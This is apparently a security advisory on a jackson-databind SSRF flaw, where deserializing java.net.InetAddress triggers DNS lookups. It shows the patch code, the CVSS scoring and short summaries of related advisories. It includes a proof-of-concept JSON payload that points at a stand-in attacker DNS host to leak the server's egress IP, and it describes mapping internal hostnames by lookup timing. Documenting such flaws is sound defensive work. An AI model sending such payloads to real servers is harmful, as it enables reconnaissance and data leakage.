Sep 29, 2026·4 min read·1 visit
Jackson Databind's deserializer for java.net.InetAddress executes synchronous, blocking DNS resolution when processing hostnames, enabling remote, unauthenticated attackers to trigger outbound Server-Side Request Forgery (SSRF) via crafted JSON payloads.
A Server-Side Request Forgery (SSRF) vulnerability exists in FasterXML jackson-databind before versions 2.18.9, 2.21.5, 2.22.1, 3.1.5, and 3.2.1. The flaw occurs during the deserialization of java.net.InetAddress fields, where the library implicitly triggers eager DNS lookups. Unauthenticated remote attackers can exploit this behavior by passing arbitrary hostnames in JSON fields, forcing target servers to make outbound DNS lookup requests.
Jackson Databind is a widely utilized Java library for parsing and mapping JSON data to Java objects. When configuring serialization and deserialization routines, applications can ingest data containing complex types, including network-related Java native classes. The vulnerability resides within the deserialization path of java.net.InetAddress assets, exposing an unauthenticated attack surface to remote entities.
The vulnerability is classified under CWE-918 (Server-Side Request Forgery). By default, applications exposing endpoints that accept arbitrary JSON input and map it to Java models containing InetAddress elements can be forced to initiate outbound DNS lookups. This network behavior allows malicious actors to conduct infrastructure mapping, internal hostname verification, and out-of-band data exfiltration.
The root cause of the vulnerability lies in the deserialization routing within FromStringDeserializer.Std._deserialize(). When processing a string input that maps to the case STD_INET_ADDRESS, the deserializer passes the unvalidated value directly to InetAddress.getByName(value).
Java's native InetAddress.getByName(String host) method possesses an implicit network resolution dependency. If the passed string is a valid numeric IP address literal (either IPv4 or IPv6), the JVM parses it locally without network interaction. However, if the input is any other string, the JVM treats it as a hostname and initiates a synchronous, blocking outbound DNS lookup through the operating system's configured resolver.
This behavior is visualized in the sequence below:
Because jackson-databind did not validate that the string was restricted to IP literals prior to invoking getByName(), arbitrary strings trigger external DNS resolutions. Attackers can leverage this to force server-side connections to infrastructure controlled by the adversary.
The security issue was corrected in commit 2fc7bd9057dd051d7dea0e5fcad89822d0fa5ebd by implementing a local validation utility, InetAddressValidator.java. This validator is adapted from Google Guava's InetAddresses.isInetAddress() implementation to perform lexical checkouts without initiating any network activity.
In FromStringDeserializer.java, the case block was modified as follows:
// Before Patch
case STD_INET_ADDRESS:
return InetAddress.getByName(value);
// After Patch
case STD_INET_ADDRESS:
// Prevent DNS lookup: only accept valid IP address literals
if (!InetAddressValidator.isInetAddress(value)) {
return ctxt.handleWeirdStringValue(_valueClass, value,
"Not a valid IP address string literal");
}
return InetAddress.getByName(value);The validation layer guarantees that the deserializer will immediately reject arbitrary hostnames. The structure of InetAddressValidator.java focuses on checking the formatting rules of both IPv4 dotted-quad configurations and IPv6 hexadecimal blocks:
class InetAddressValidator {
static boolean isInetAddress(String ipString) {
return _ipStringToBytes(ipString) != null;
}
// Internal parsing logic performs strict numerical validations
}This validator rejects leading zeros in IPv4 octets to avoid differences between decimal and octal interpretations across distinct JVM runtime implementations. Consequently, parser differential attacks are neutralized.
Exploitation requires an endpoint exposing a JSON parsing routine that deserializes data into a POJO with an InetAddress property. The attacker does not need authentication to execute this attack if the host application maps the API publicly.
Consider a vulnerable POJO registration:
public class SystemEndpoint {
public String hostIdentifier;
public java.net.InetAddress connectionAddress;
}An attacker crafts a JSON payload containing an Out-of-Band (OOB) domain designed to log resolution queries:
{
"hostIdentifier": "production-worker-01",
"connectionAddress": "exfiltrate-test.attacker-controlled-dns.com"
}When the web application ingests this payload, the library resolves the hostname during deserialization. The lookup query is successfully forwarded to the authoritative DNS server managed by the attacker. This confirms the vulnerability and leaks the egress server IP.
The vulnerability has a CVSS v3.1 base score of 5.3 (Medium). The vector string is CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N. The impact is limited to low confidentiality leakage.
Because the DNS resolution is synchronous and blocking, excessive requests to slow or non-responsive DNS authorities could lead to resource exhaustion on the target server. Furthermore, adversaries can utilize this vulnerability to map internal network boundaries by querying local hostnames and monitoring the timing of the response. If the DNS lookup completes quickly, the internal name exists; if it times out, the name is likely invalid.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N| Product | Affected Versions | Fixed Version |
|---|---|---|
jackson-databind (com.fasterxml.jackson.core) FasterXML | >= 2.0.0, < 2.18.9 | 2.18.9 |
jackson-databind (com.fasterxml.jackson.core) FasterXML | >= 2.19.0, < 2.21.5 | 2.21.5 |
jackson-databind (com.fasterxml.jackson.core) FasterXML | >= 2.22.0, < 2.22.1 | 2.22.1 |
jackson-databind (tools.jackson.core) FasterXML | >= 3.0.0, < 3.1.5 | 3.1.5 |
jackson-databind (tools.jackson.core) FasterXML | >= 3.2.0, < 3.2.1 | 3.2.1 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-918 (Server-Side Request Forgery) |
| Attack Vector | Network (Unauthenticated) |
| CVSS v3.1 Score | 5.3 (Medium) |
| Exploit Status | Proof-of-Concept Available |
| CISA KEV Status | Not Listed |
| Impact Category | Low Confidentiality (SSRF via DNS) |
An application receives the administrative control to fetch a resource from a remote location, but does not sufficiently validate the target URI, allowing attackers to direct the request to arbitrary destinations.
An insecure deserialization vulnerability exists in FasterXML jackson-databind due to improper validation of URI schemes when resolving java.nio.file.Path properties. When binding untrusted JSON input to a Path field, the deserializer resolves attacker-supplied URIs without restriction. If the scheme is unrecognized by the default filesystem, the application falls back to querying registered SPI FileSystemProvider instances, causing class loading and potential side effects in environments with custom providers.
CVE-2026-68497 is a high-severity CPU Denial of Service (DoS) vulnerability in jackson-databind. It arises because the library bypasses default input constraint checks when parsing stringified XML datatypes, subsequently passing arbitrary-length inputs to JDK constructors with quadratic execution complexity.
ZohoCorp ManageEngine EventLog Analyzer and Log360 before build 13071 were vulnerable to a denial-of-service (DoS) vulnerability that allowed unauthenticated remote attackers to crash the log collector service using malformed syslog packets.
A critical HTTP request/response smuggling vulnerability (CWE-444) exists in Citrix NetScaler ADC and Citrix NetScaler Gateway. This flaw arises from inconsistent request boundary parsing between NetScaler appliances and backend web servers, allowing remote, unauthenticated attackers to bypass security boundaries, access restricted resources, or hijack active user sessions on multiplexed TCP connections.
A high-severity Cross-Site Scripting (XSS) vulnerability in Angular server-side rendering (SSR) component allows unauthenticated attackers to execute arbitrary client-side JavaScript. The flaw is caused by a parsing discrepancy between the server-side DOM emulator, Domino, and standard client-side browser HTML5 parsers. When serializing ProcessingInstruction nodes inside raw-content fallback elements, Domino fails to escape matching ancestor closing tags, causing the client-side parser to transition out of raw-text mode prematurely and execute subsequent sibling elements as active HTML.
A validation bypass vulnerability exists in the npm package `ip-address` from version 10.2.0 to 10.5.1. The library's `Address6.isPrivate()` classifier fails to recognize the NAT64 local-use prefix range 64:ff9b:1::/48 as a restricted, private subnet. In networks implementing NAT64 routing configurations, an attacker can exploit this flaw to execute Server-Side Request Forgery (SSRF) and bypass local trust-boundary validations.